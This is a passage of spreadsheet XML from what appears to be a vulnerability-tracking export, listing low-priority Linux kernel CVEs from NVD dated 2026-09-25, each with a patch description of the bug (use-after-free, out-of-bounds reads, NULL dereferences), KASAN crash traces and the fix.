eventfd_ctx_fdget() fails") added that clearing, and spelled out the
invariant the rest of the file relies on: "we consider 'v-&gt;config_ctx'
valid if it is not NULL".  The window between the swap and the clearing
still breaks it.  vhost_vdpa_config_cb() only tests for NULL, so a config
interrupt delivered inside the window hands the ERR_PTR to
eventfd_signal().
Check the fd before installing it instead.  That closes the window and
matches how vhost_vring_ioctl() handles the same failure for the vq call
fd.
It also stops a rejected fd from tearing down a config interrupt that was
working: until now the swap replaced the live context and put it, so
after an EBADF the device silently stopped delivering config interrupts
until userspace installed a new fd.</t>
        </is>
      </c>
      <c r="T631" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97993</t>
        </is>
      </c>
    </row>
    <row r="632">
      <c r="A632" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B632" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C632" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97994</t>
        </is>
      </c>
      <c r="D632" s="5" t="inlineStr"/>
      <c r="E632" s="5" t="inlineStr"/>
      <c r="F632" s="5" t="inlineStr"/>
      <c r="G632" s="5" t="inlineStr"/>
      <c r="H632" s="5" t="inlineStr"/>
      <c r="I632" s="5" t="inlineStr"/>
      <c r="J632" s="5" t="inlineStr"/>
      <c r="K632" s="5" t="inlineStr"/>
      <c r="L632" s="5" t="inlineStr"/>
      <c r="M632" s="5" t="inlineStr"/>
      <c r="N632" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O632" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P632" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q632" s="5" t="inlineStr"/>
      <c r="R632" s="5" t="inlineStr"/>
      <c r="S632" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vhost/vdpa: reject VRING_NUM larger than device max
vhost_vring_set_num() accepts any non-zero power-of-two queue size that
fits in 16 bits. vhost-vdpa then passes that value to set_vq_num()
without comparing it with get_vq_num_max().
A process with access to /dev/vhost-vdpa-* can therefore configure a
queue larger than the device advertises. With vdpa_sim, the worker can
walk descriptors beyond the mapped descriptor ring. KASAN reports a
16-byte out-of-bounds read, corresponding to one vring_desc, in the
vringh IOTLB path:
  BUG: KASAN: out-of-bounds in _copy_from_iter
  Read of size 16
  copy_from_iotlb
  copydesc_iotlb
  vringh_getdesc_iotlb
  vdpasim_net_work
Cache get_vq_num_max() immediately after reset. Some backends derive
it from writable queue-size state, so querying it after SET_NUM may
return the current size instead of the device capability. Invalidate
the cached value before reset so a failed reset leaves SET_NUM
disabled.
For VHOST_SET_VRING_NUM, copy the complete vring state once and use
the same index and size for validation, vq-&gt;num, and set_vq_num().
This ensures that validation and use operate on the same copied values.</t>
        </is>
      </c>
      <c r="T632" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97994</t>
        </is>
      </c>
    </row>
    <row r="633">
      <c r="A633" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B633" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C633" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97995</t>
        </is>
      </c>
      <c r="D633" s="5" t="inlineStr"/>
      <c r="E633" s="5" t="inlineStr"/>
      <c r="F633" s="5" t="inlineStr"/>
      <c r="G633" s="5" t="inlineStr"/>
      <c r="H633" s="5" t="inlineStr"/>
      <c r="I633" s="5" t="inlineStr"/>
      <c r="J633" s="5" t="inlineStr"/>
      <c r="K633" s="5" t="inlineStr"/>
      <c r="L633" s="5" t="inlineStr"/>
      <c r="M633" s="5" t="inlineStr"/>
      <c r="N633" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O633" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P633" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q633" s="5" t="inlineStr"/>
      <c r="R633" s="5" t="inlineStr"/>
      <c r="S633" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
virtio_console: do not free control-out buffers on remove
__send_control_msg() publishes &amp;portdev-&gt;cpkt as the control-out
virtqueue cookie. remove_vqs() walks every virtqueue and passes leftover
cookies to free_buf(), which treats them as struct port_buffer and
reads sgpages.
If a control message is still on c_ovq when the device is unbound,
free_buf() reads past the ports_device object.
KASAN reported slab-out-of-bounds in free_buf():
	free_buf
	remove_vqs
	virtcons_remove
	unbind_store
The object was the ports_device allocated in virtcons_probe().
Drain c_ovq without freeing. The packet lives in portdev and is released
with it.</t>
        </is>
      </c>
      <c r="T633" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97995</t>
        </is>
      </c>
    </row>
    <row r="634">
      <c r="A634" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B634" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C634" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97996</t>
        </is>
      </c>
      <c r="D634" s="5" t="inlineStr"/>
      <c r="E634" s="5" t="inlineStr"/>
      <c r="F634" s="5" t="inlineStr"/>
      <c r="G634" s="5" t="inlineStr"/>
      <c r="H634" s="5" t="inlineStr"/>
      <c r="I634" s="5" t="inlineStr"/>
      <c r="J634" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K634" s="5" t="inlineStr"/>
      <c r="L634" s="5" t="inlineStr"/>
      <c r="M634" s="5" t="inlineStr"/>
      <c r="N634" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O634" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P634" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q634" s="5" t="inlineStr"/>
      <c r="R634" s="5" t="inlineStr"/>
      <c r="S634" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
virtio: fix use-after-free in unregister_virtio_device()
device_unregister() is device_del() plus put_device(). When the caller
holds no extra reference, that drops the last one and runs the release
callback, which for several transports frees the memory the embedded
struct virtio_device sits in. unregister_virtio_device() then calls
virtio_debug_device_exit(), which reads dev-&gt;debugfs_dir out of the freed
object.
Affected transports are the ones whose release callback frees and whose
remove path takes no reference: virtio_mmio, virtio_vdpa, virtio_uml,
mlxbf-tmfifo and virtio_ccw. virtio_pci is unaffected because
virtio_pci_remove() brackets the call with get_device() and put_device().
Remove the debugfs entries before the device can go away. They are only
accessed through the protected debugfs interface, so
debugfs_remove_recursive() waits for in-progress file operations before
returning. Tearing them down while the device is still alive is therefore
safe.
Reproduced on User-Mode Linux with CONFIG_KASAN and CONFIG_VIRTIO_DEBUG
by unbinding a virtio-uml device:
  BUG: KASAN: slab-use-after-free in virtio_debug_device_exit+0x36/0x4d
  Read of size 8 at addr 00000000616e0b10 by task init/1
   __asan_report_load8_noabort
   virtio_debug_device_exit+0x36/0x4d
   unregister_virtio_device+0x48/0x75
   virtio_uml_remove
   platform_remove
   device_release_driver_internal
   unbind_store
  Freed by task 1:
   kfree
   virtio_uml_release_dev
   device_release
   kobject_put
   put_device
   device_unregister
With this applied, the report is gone and unbind is clean.</t>
        </is>
      </c>
      <c r="T634" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97996</t>
        </is>
      </c>
    </row>
    <row r="635">
      <c r="A635" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B635" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C635" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97997</t>
        </is>
      </c>
      <c r="D635" s="5" t="inlineStr"/>
      <c r="E635" s="5" t="inlineStr"/>
      <c r="F635" s="5" t="inlineStr"/>
      <c r="G635" s="5" t="inlineStr"/>
      <c r="H635" s="5" t="inlineStr"/>
      <c r="I635" s="5" t="inlineStr"/>
      <c r="J635" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K635" s="5" t="inlineStr"/>
      <c r="L635" s="5" t="inlineStr"/>
      <c r="M635" s="5" t="inlineStr"/>
      <c r="N635" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O635" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P635" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q635" s="5" t="inlineStr"/>
      <c r="R635" s="5" t="inlineStr"/>
      <c r="S635" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
virtio_ring: fix stale descriptor flags after a failed packed add
In a packed ring the AVAIL and USED bits sit in the descriptor itself,
so writing them makes that descriptor available. Those bit combinations
flip meaning on every round of the ring, tracked by a wrap counter, so
invalidating or validating a descriptor means inverting both bits.
Commit 1ce9e6055fa0 ("virtio_ring: introduce packed ring support") has
virtqueue_add_packed() make every descriptor of a chain available as it
maps the chain, and write the head last. The device consumes the ring in
order and stops at a head that is not available yet, so it never reaches
the rest.
When vring_map_one_sg() fails partway, unmap_release unmaps the segments
and restores avail_used_flags, but the descriptors it wrote to in the
ring stay marked with AVAIL and USED bits. The head is now the only
entry that keeps the device from consuming these stale entries.
For example, the ring would look like this now.
  Z - pre-previous command
  A - previous command
  B - aborted command
  C - current command
  [A1 DONE] [A2 DONE] &lt;C1 EMPTY&gt; [B2] [B3] [Z1 DONE]
When the driver now attempts to issue the C command, the next add starts
at the same head as B. If C spans less descriptors than B, there is no
end marker because AVAIL and USED bits were still in place. And that
means the device will start interpreting these stale entries (B2/B3) as
another command entry, which then blocks the queue.
This effect typically happens in swiotlb configurations under memory
pressure, because vring_map_one_sg() can then fail with larger I/O
requests which then leads to command abortions.
There are broadly 2 ways to avoid leaving those flags behind:
  1) Defer those flags too until the chain is complete.
  2) Rewrite those flags for the previous wrap counter.
Implement the second option in both packed add paths. The first option
traverses the chain a second time on every successful add. The second
option invalidates all added descriptors when any add fails.
With this patch applied, a packed virtqueue keeps completing requests
after a failed add.</t>
        </is>
      </c>
      <c r="T635" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97997</t>
        </is>
      </c>
    </row>
    <row r="636">
      <c r="A636" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B636" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C636" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97998</t>
        </is>
      </c>
      <c r="D636" s="5" t="inlineStr"/>
      <c r="E636" s="5" t="inlineStr"/>
      <c r="F636" s="5" t="inlineStr"/>
      <c r="G636" s="5" t="inlineStr"/>
      <c r="H636" s="5" t="inlineStr"/>
      <c r="I636" s="5" t="inlineStr"/>
      <c r="J636" s="5" t="inlineStr"/>
      <c r="K636" s="5" t="inlineStr"/>
      <c r="L636" s="5" t="inlineStr"/>
      <c r="M636" s="5" t="inlineStr"/>
      <c r="N636" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O636" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P636" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q636" s="5" t="inlineStr"/>
      <c r="R636" s="5" t="inlineStr"/>
      <c r="S636" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
netfilter: nfnetlink_log: cope with concurrent instance destruction
Instances are refcounted. However, only memory release happens on the
1 -&gt; 0 transition; the unlink from hashes can occur with any refcount.
Uncooperative userspace can force a situation where a queue is pending
for destruction from netlink event while a different socket with same
portid processes an UNBIND request.
With right timing, this will unhash the instance again:
Oops: general protection fault, [..]
Call Trace:
 &lt;TASK&gt;
 nfulnl_recv_config+0x31a/0xd50
 nfnetlink_rcv_msg+0x7c2/0xeb0</t>
        </is>
      </c>
      <c r="T636" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97998</t>
        </is>
      </c>
    </row>
    <row r="637">
      <c r="A637" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B637" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C637" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98000</t>
        </is>
      </c>
      <c r="D637" s="5" t="inlineStr"/>
      <c r="E637" s="5" t="inlineStr"/>
      <c r="F637" s="5" t="inlineStr"/>
      <c r="G637" s="5" t="inlineStr"/>
      <c r="H637" s="5" t="inlineStr"/>
      <c r="I637" s="5" t="inlineStr"/>
      <c r="J637" s="5" t="inlineStr"/>
      <c r="K637" s="5" t="inlineStr"/>
      <c r="L637" s="5" t="inlineStr"/>
      <c r="M637" s="5" t="inlineStr"/>
      <c r="N637" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O637" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P637" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q637" s="5" t="inlineStr"/>
      <c r="R637" s="5" t="inlineStr"/>
      <c r="S637" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
hwmon: Fix potential UAF in pec_store
Sashiko reports:
In pec_store(), a guard(mutex)(&amp;hwdev-&gt;lock) is taken. If the chip write
operation returns an error other than -EOPNOTSUPP, the code jumps to the
put label, which calls put_device(hdev). If this drops the final reference,
the device is freed. When the function then returns, the guard cleanup
function runs and attempts to unlock the freed mutex.
Use scoped_guard() instead of guard() to avoid the problem.</t>
        </is>
      </c>
      <c r="T637" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98000</t>
        </is>
      </c>
    </row>
    <row r="638">
      <c r="A638" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B638" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C638" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98001</t>
        </is>
      </c>
      <c r="D638" s="5" t="inlineStr"/>
      <c r="E638" s="5" t="inlineStr"/>
      <c r="F638" s="5" t="inlineStr"/>
      <c r="G638" s="5" t="inlineStr"/>
      <c r="H638" s="5" t="inlineStr"/>
      <c r="I638" s="5" t="inlineStr"/>
      <c r="J638" s="5" t="inlineStr"/>
      <c r="K638" s="5" t="inlineStr"/>
      <c r="L638" s="5" t="inlineStr"/>
      <c r="M638" s="5" t="inlineStr"/>
      <c r="N638" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O638" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P638" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q638" s="5" t="inlineStr"/>
      <c r="R638" s="5" t="inlineStr"/>
      <c r="S638" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
hwmon: (ltc4282) Make sure clk_init_data is fully initialized
The clk_init_data structure contains several mutually-exclusive members
for different methods to specify the possible parents of a clock,
prompting drivers to initialize only the members they need.  However,
not initializing all members may cause subtle issues, which are only
exposed when CONFIG_INIT_STACK_ALL_PATTERN or CONFIG_INIT_STACK_NONE is
enabled.
ltc428_clk_provider_setup() does not fill in any parent clocks, and
assumes that init.num_parents is NULL.  However, the latter in
uninitialized, and thus may cause a crash.
Make sure all members are fully initialized, to fix such bugs, and to
avoid future breakage when converting drivers to a different method for
specifying the parents.</t>
        </is>
      </c>
      <c r="T638" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98001</t>
        </is>
      </c>
    </row>
    <row r="639">
      <c r="A639" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B639" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C639" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98003</t>
        </is>
      </c>
      <c r="D639" s="5" t="inlineStr"/>
      <c r="E639" s="5" t="inlineStr"/>
      <c r="F639" s="5" t="inlineStr"/>
      <c r="G639" s="5" t="inlineStr"/>
      <c r="H639" s="5" t="inlineStr"/>
      <c r="I639" s="5" t="inlineStr"/>
      <c r="J639" s="5" t="inlineStr"/>
      <c r="K639" s="5" t="inlineStr"/>
      <c r="L639" s="5" t="inlineStr"/>
      <c r="M639" s="5" t="inlineStr"/>
      <c r="N639" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O639" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P639" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q639" s="5" t="inlineStr"/>
      <c r="R639" s="5" t="inlineStr"/>
      <c r="S639" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/amd: Do not reallocate GA log buffers on resume
Commit c5e1a1eb9279 ("iommu/amd: Simplify and Consolidate Virtual APIC
(AVIC) Enablement") moved the GA log allocation from iommu_init_pci()
to enable_iommus_vapic(), which is called on every resume.
iommu_init_ga_log() assigns iommu-&gt;ga_log and iommu-&gt;ga_log_tail
unconditionally. Each resume therefore replaces the boot-time pointers
and leaks both old allocations. The function also uses GFP_KERNEL from a
syscore resume callback, where interrupts are disabled and the non-boot
CPUs are offline.
Return early if both buffers are already allocated. Clear the pointers
in free_ga_log() so a partial allocation failure cannot leave ga_log
dangling.</t>
        </is>
      </c>
      <c r="T639" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98003</t>
        </is>
      </c>
    </row>
    <row r="640">
      <c r="A640" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B640" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C640" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98004</t>
        </is>
      </c>
      <c r="D640" s="5" t="inlineStr"/>
      <c r="E640" s="5" t="inlineStr"/>
      <c r="F640" s="5" t="inlineStr"/>
      <c r="G640" s="5" t="inlineStr"/>
      <c r="H640" s="5" t="inlineStr"/>
      <c r="I640" s="5" t="inlineStr"/>
      <c r="J640" s="5" t="inlineStr"/>
      <c r="K640" s="5" t="inlineStr"/>
      <c r="L640" s="5" t="inlineStr"/>
      <c r="M640" s="5" t="inlineStr"/>
      <c r="N640" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O640" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P640" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q640" s="5" t="inlineStr"/>
      <c r="R640" s="5" t="inlineStr"/>
      <c r="S640" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/riscv: Serialize command queue publishing
Serialize command queue publishing so software producer state advances only
after a command is written and the hardware tail is updated. Wait for
hardware consumption outside the queue lock when the command queue is full
so other CPUs are not blocked behind a long poll.</t>
        </is>
      </c>
      <c r="T640" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98004</t>
        </is>
      </c>
    </row>
    <row r="641">
      <c r="A641" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B641" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C641" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98005</t>
        </is>
      </c>
      <c r="D641" s="5" t="inlineStr"/>
      <c r="E641" s="5" t="inlineStr"/>
      <c r="F641" s="5" t="inlineStr"/>
      <c r="G641" s="5" t="inlineStr"/>
      <c r="H641" s="5" t="inlineStr"/>
      <c r="I641" s="5" t="inlineStr"/>
      <c r="J641" s="5" t="inlineStr"/>
      <c r="K641" s="5" t="inlineStr"/>
      <c r="L641" s="5" t="inlineStr"/>
      <c r="M641" s="5" t="inlineStr"/>
      <c r="N641" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O641" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P641" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q641" s="5" t="inlineStr"/>
      <c r="R641" s="5" t="inlineStr"/>
      <c r="S641" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
erofs: delimit inode_share cache key components
Previously, inode_share keys were encoded as follows:
  fingerprint || domain_id
It would be better to have a separator between the fingerprint and domain
ID so that the fingerprint won't be parsed as part of a domain ID.
Change the key encoding as follows:
  domain_id || '\0' || fingerprint
Since domain_id is a NUL-terminated string, this makes the in-memory key
indices unambiguous.</t>
        </is>
      </c>
      <c r="T641" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98005</t>
        </is>
      </c>
    </row>
    <row r="642">
      <c r="A642" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B642" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C642" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98006</t>
        </is>
      </c>
      <c r="D642" s="5" t="inlineStr"/>
      <c r="E642" s="5" t="inlineStr"/>
      <c r="F642" s="5" t="inlineStr"/>
      <c r="G642" s="5" t="inlineStr"/>
      <c r="H642" s="5" t="inlineStr"/>
      <c r="I642" s="5" t="inlineStr"/>
      <c r="J642" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K642" s="5" t="inlineStr"/>
      <c r="L642" s="5" t="inlineStr"/>
      <c r="M642" s="5" t="inlineStr"/>
      <c r="N642" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O642" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P642" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q642" s="5" t="inlineStr"/>
      <c r="R642" s="5" t="inlineStr"/>
      <c r="S642" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: caiaq: Decoupling ep1_in_urb in caiaq dev
The epq_in_urb object belonging to the caiaq device is coupled within
the struct snd_usb_caiaqdev. After usb_submit_urb(epq_in_urb, GFP_KERNEL)
executes successfully, epq_in_urb is successfully added to the urbp_list
queue of the dummy HCD driver (userspace specifies dummy_hcd as the HCD
layer driver for the caiaq USB device).
When init_card() calls snd_usb_caiaq_send_command() which subsequently
fails due to a timeout, and proceeds to call snd_card_free() to release
the card, the embedded ep1_in_urb object is also freed. When the dummy
HCD driver detects that the URB has been unlinked, it returns the URB
(by usb_hcd_giveback_urb()), which triggers [1].
Decouple the ep1_in_urb object from the struct snd_usb_caiaqdev and switch
to using a pointer instead. Separately allocate and manage the memory for
ep1_in_urb to prevent the release of the snd_card memory object from
interfering with it.
midi_out_urb has the same issue as ep1_in_urb and is handled in the same
way.
[1]
BUG: KASAN: slab-use-after-free in usb_free_urb+0x24/0x120 drivers/usb/core/urb.c:96
Write of size 4 at addr ffff88803cee1050 by task ktimers/1/29
Call Trace:
 usb_free_urb+0x24/0x120 drivers/usb/core/urb.c:96
 dummy_timer+0xaac/0x4d50 drivers/usb/gadget/udc/dummy_hcd.c:2019
 __run_hrtimer kernel/time/hrtimer.c:2067 [inline]
 __hrtimer_run_queues+0x3eb/0xaf0 kernel/time/hrtimer.c:2124
 hrtimer_run_softirq+0x1e1/0x2e0 kernel/time/hrtimer.c:2141
Allocated by task 36:
 snd_card_new+0x7b/0x110 sound/core/init.c:184
 create_card sound/usb/caiaq/device.c:429 [inline]
 snd_probe+0x236/0x1af0 sound/usb/caiaq/device.c:544
Freed by task 36:
 snd_card_free_when_closed sound/core/init.c:630 [inline]
 snd_card_free+0x138/0x1d0 sound/core/init.c:662
 snd_probe+0x162b/0x1af0 sound/usb/caiaq/device.c:553</t>
        </is>
      </c>
      <c r="T642" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98006</t>
        </is>
      </c>
    </row>
    <row r="643">
      <c r="A643" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B643" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C643" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98007</t>
        </is>
      </c>
      <c r="D643" s="5" t="inlineStr"/>
      <c r="E643" s="5" t="inlineStr"/>
      <c r="F643" s="5" t="inlineStr"/>
      <c r="G643" s="5" t="inlineStr"/>
      <c r="H643" s="5" t="inlineStr"/>
      <c r="I643" s="5" t="inlineStr"/>
      <c r="J643" s="5" t="inlineStr">
        <is>
          <t>suse</t>
        </is>
      </c>
      <c r="K643" s="5" t="inlineStr"/>
      <c r="L643" s="5" t="inlineStr"/>
      <c r="M643" s="5" t="inlineStr"/>
      <c r="N643" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O643" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P643" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q643" s="5" t="inlineStr"/>
      <c r="R643" s="5" t="inlineStr"/>
      <c r="S643" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Reject non-scalar bpf_loop iteration counts
bpf_loop() declares its nr_loops argument as ARG_ANYTHING. Privileged
programs may pass pointer values to such arguments, so check_func_arg()
lets a pointer-valued R1 reach the helper-specific checks.
Since commit bb124da69c47 ("bpf: keep track of max number of bpf_loop
callback iterations"), the verifier marks R1 precise and reads its upper
bound to limit callback simulation. Precision backtracking only accepts
scalar registers, so passing a pointer instead triggers the "backtracking
misuse" verifier warning. Kernels with panic_on_warn enabled subsequently
panic.
Introduce ARG_SCALAR for helper arguments that only accept scalar values
and use it for bpf_loop() nr_loops. Generic helper argument validation then
rejects pointers before loop inlining and precision processing.</t>
        </is>
      </c>
      <c r="T643" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98007</t>
        </is>
      </c>
    </row>
    <row r="644">
      <c r="A644" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B644" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C644" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98008</t>
        </is>
      </c>
      <c r="D644" s="5" t="inlineStr"/>
      <c r="E644" s="5" t="inlineStr"/>
      <c r="F644" s="5" t="inlineStr"/>
      <c r="G644" s="5" t="inlineStr"/>
      <c r="H644" s="5" t="inlineStr"/>
      <c r="I644" s="5" t="inlineStr"/>
      <c r="J644" s="5" t="inlineStr"/>
      <c r="K644" s="5" t="inlineStr"/>
      <c r="L644" s="5" t="inlineStr"/>
      <c r="M644" s="5" t="inlineStr"/>
      <c r="N644" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O644" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P644" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q644" s="5" t="inlineStr"/>
      <c r="R644" s="5" t="inlineStr"/>
      <c r="S644" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: macb: fix NULL pointer dereference on unbind with fixed-link
When the device tree describes a fixed-link and has no "mdio" child
node, macb_mii_init() returns early without allocating the MDIO bus,
leaving bp-&gt;mii_bus as NULL.
Two cleanup paths then dereference this NULL bus:
1. On driver unbind, macb_remove() unconditionally calls
   mdiobus_unregister(bp-&gt;mii_bus), which oopses:
  Unable to handle kernel NULL pointer dereference at virtual address 00000000000004a8
  pc : mdiobus_unregister+0x14/0xa4
  lr : macb_remove+0x38/0xa4
  Call trace:
   mdiobus_unregister+0x14/0xa4 (P)
   macb_remove+0x38/0xa4
   platform_remove+0x20/0x30
   device_release_driver_internal+0x1c8/0x224
   unbind_store+0xb4/0xbc
2. On the probe error path in macb_probe(), reached when
   macb_mii_init() has succeeded but a subsequent step fails, the
   err_out_unregister_mdio label runs the same unconditional cleanup.
mdiobus_unregister() and mdiobus_free() do not guard against a NULL
bus, so guard the calls in both macb_remove() and the probe error
path.</t>
        </is>
      </c>
      <c r="T644" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98008</t>
        </is>
      </c>
    </row>
    <row r="645">
